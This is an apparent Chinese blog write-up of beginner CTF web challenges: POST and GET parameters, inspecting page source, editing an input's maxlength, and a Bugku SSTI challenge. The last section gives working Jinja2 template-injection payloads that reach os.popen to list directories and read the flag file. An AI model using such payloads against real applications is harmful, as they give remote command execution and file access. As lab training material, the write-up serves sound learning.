CTF练习题WP1

 1.CTF-web基础$_POST

(1) 题目:

        $what=$_POST['what'];

        echo $what;

        if($what=='flag')

        echo 'flag{****}';

(2) 解题关键:hackber插件

2、滑稽

解题方法:

直接按F12,查看“body”就能得到flag

3、计算器

发现只能输入一位数

 解题方法:

把maxlength的值改成2、3······(值为几代表能输入的为几位)

 最终输入计算结果得到flag

4、GET

(1) 题目

(2) 解题方法:

直接在ip后加“/?What=flag”

 

5、bugku–Simple_SSLI_2

(1) 题目

 

 (2) 解题方法

分别在IP后加上:

/?{{ config.__class__.__init__.__globals__['os'].popen('ls ../').read() }}

/?{{ config.__class__.__init__.__globals__['os'].popen('ls ../app').read() }}

/?{{ config.__class__.__init__.__globals__['os'].popen('cat ../app/flag').read() }}

  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 3
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值